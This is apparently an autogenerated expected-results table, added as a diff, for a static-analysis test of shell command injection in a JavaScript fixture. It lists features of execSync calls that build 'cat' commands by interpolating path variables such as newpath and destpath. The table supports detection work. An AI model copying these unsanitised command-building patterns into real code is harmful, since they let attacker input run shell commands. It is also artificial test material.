contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:10:32:33 | `cat fo ... wpath}` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:11:32:22 | cat foo/bar/ | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:11:32:22 | cat foo/bar/ | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:11:32:22 | cat foo/bar/ | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:11:32:22 | cat foo/bar/ | stringConcatenatedWith | -endpoint- newpath | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:25:32:31 | newpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:25:32:31 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:25:32:31 | newpath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:25:32:31 | newpath | stringConcatenatedWith | 'cat foo/bar/' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:1:34:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:1:34:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:1:34:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:1:34:54 | exceptional return of execSyn ... utf8'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:1:34:54 | exceptional return of execSyn ... utf8'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:1:34:54 | exceptional return of execSyn ... utf8'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:1:34:54 | execSyn ... utf8'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:1:34:54 | execSyn ... utf8'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:1:34:54 | execSyn ... utf8'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:10:34:33 | `cat fo ... wpath}` | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:10:34:33 | `cat fo ... wpath}` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:10:34:33 | `cat fo ... wpath}` | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:10:34:33 | `cat fo ... wpath}` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:10:34:33 | `cat fo ... wpath}` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:10:34:33 | `cat fo ... wpath}` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:11:34:22 | cat foo/bar/ | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:11:34:22 | cat foo/bar/ | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:11:34:22 | cat foo/bar/ | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:11:34:22 | cat foo/bar/ | stringConcatenatedWith | -endpoint- newpath | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:25:34:31 | newpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:25:34:31 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:25:34:31 | newpath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:25:34:31 | newpath | stringConcatenatedWith | 'cat foo/bar/' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:36:34:53 | {encoding: 'utf8'} | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:36:34:53 | {encoding: 'utf8'} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:36:34:53 | {encoding: 'utf8'} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:36:34:53 | {encoding: 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:36:34:53 | {encoding: 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:36:34:53 | {encoding: 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:37:34:44 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:37:34:44 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:37:34:44 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:37:34:52 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:37:34:52 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:37:34:52 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:37:34:52 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:37:34:52 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:37:34:52 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:47:34:52 | 'utf8' | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:47:34:52 | 'utf8' | InputAccessPathFromCallee | 1.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:47:34:52 | 'utf8' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:47:34:52 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:47:34:52 | 'utf8' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:47:34:52 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:47:34:52 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:47:34:52 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:1:36:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:1:36:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:1:36:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:1:36:77 | exceptional return of execSyn ... utf8'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:1:36:77 | exceptional return of execSyn ... utf8'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:1:36:77 | exceptional return of execSyn ... utf8'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:1:36:77 | execSyn ... utf8'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:1:36:77 | execSyn ... utf8'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:1:36:77 | execSyn ... utf8'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:10:36:33 | "/bin/c ... puinfo" | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:10:36:33 | "/bin/c ... puinfo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:10:36:33 | "/bin/c ... puinfo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:10:36:33 | "/bin/c ... puinfo" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:10:36:33 | "/bin/c ... puinfo" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:10:36:33 | "/bin/c ... puinfo" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:36:36:76 | { uid: ... 'utf8'} | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:36:36:76 | { uid: ... 'utf8'} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:36:36:76 | { uid: ... 'utf8'} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:36:36:76 | { uid: ... 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:36:36:76 | { uid: ... 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:36:36:76 | { uid: ... 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:38:36:40 | uid | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:38:36:40 | uid | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:38:36:40 | uid | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:38:36:46 | uid: 1000 | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:38:36:46 | uid: 1000 | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:38:36:46 | uid: 1000 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:38:36:46 | uid: 1000 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:38:36:46 | uid: 1000 | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:38:36:46 | uid: 1000 | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:43:36:46 | 1000 | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:43:36:46 | 1000 | InputAccessPathFromCallee | 1.uid | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:43:36:46 | 1000 | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:43:36:46 | 1000 | assignedToPropName | uid | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:43:36:46 | 1000 | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:43:36:46 | 1000 | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:43:36:46 | 1000 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:43:36:46 | 1000 | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:49:36:51 | gid | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:49:36:51 | gid | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:49:36:51 | gid | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:49:36:57 | gid: 1000 | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:49:36:57 | gid: 1000 | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:49:36:57 | gid: 1000 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:49:36:57 | gid: 1000 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:49:36:57 | gid: 1000 | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:49:36:57 | gid: 1000 | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:54:36:57 | 1000 | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:54:36:57 | 1000 | InputAccessPathFromCallee | 1.gid | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:54:36:57 | 1000 | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:54:36:57 | 1000 | assignedToPropName | gid | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:54:36:57 | 1000 | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:54:36:57 | 1000 | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:54:36:57 | 1000 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:54:36:57 | 1000 | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:60:36:67 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:60:36:67 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:60:36:67 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:60:36:75 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:60:36:75 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:60:36:75 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:60:36:75 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:60:36:75 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:60:36:75 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:70:36:75 | 'utf8' | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:70:36:75 | 'utf8' | InputAccessPathFromCallee | 1.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:70:36:75 | 'utf8' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:70:36:75 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:70:36:75 | 'utf8' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:70:36:75 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:70:36:75 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:70:36:75 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:43 | exceptional return of execSyn ... r/baz') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:43 | exceptional return of execSyn ... r/baz') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:43 | exceptional return of execSyn ... r/baz') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:43 | execSyn ... r/baz') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:43 | execSyn ... r/baz') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:43 | execSyn ... r/baz') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:52 | execSyn ... oString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:52 | execSyn ... oString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:52 | execSyn ... oString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:54 | exceptional return of execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:54 | exceptional return of execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:54 | exceptional return of execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:54 | execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:54 | execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:54 | execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:10:38:42 | 'cat /p ... ar/baz' | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:10:38:42 | 'cat /p ... ar/baz' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:10:38:42 | 'cat /p ... ar/baz' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:10:38:42 | 'cat /p ... ar/baz' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:10:38:42 | 'cat /p ... ar/baz' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:10:38:42 | 'cat /p ... ar/baz' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:45:38:52 | toString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:45:38:52 | toString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:45:38:52 | toString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:40 | exceptional return of execSyn ... path}`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:40 | exceptional return of execSyn ... path}`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:40 | exceptional return of execSyn ... path}`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:40 | execSyn ... path}`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:40 | execSyn ... path}`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:40 | execSyn ... path}`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:49 | execSyn ... oString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:49 | execSyn ... oString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:49 | execSyn ... oString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:51 | exceptional return of execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:51 | exceptional return of execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:51 | exceptional return of execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:51 | execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:51 | execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:51 | execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:10:40:39 | `cat ${ ... tpath}` | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:10:40:39 | `cat ${ ... tpath}` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:10:40:39 | `cat ${ ... tpath}` | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:10:40:39 | `cat ${ ... tpath}` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:10:40:39 | `cat ${ ... tpath}` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:10:40:39 | `cat ${ ... tpath}` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:11:40:14 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:11:40:14 | cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:11:40:14 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:11:40:14 | cat | stringConcatenatedWith | -endpoint- newpath + ' > ' + destpath | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:17:40:23 | newpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:17:40:23 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:17:40:23 | newpath | fileImports | child_process cross-spawn exec express fs shelljs | 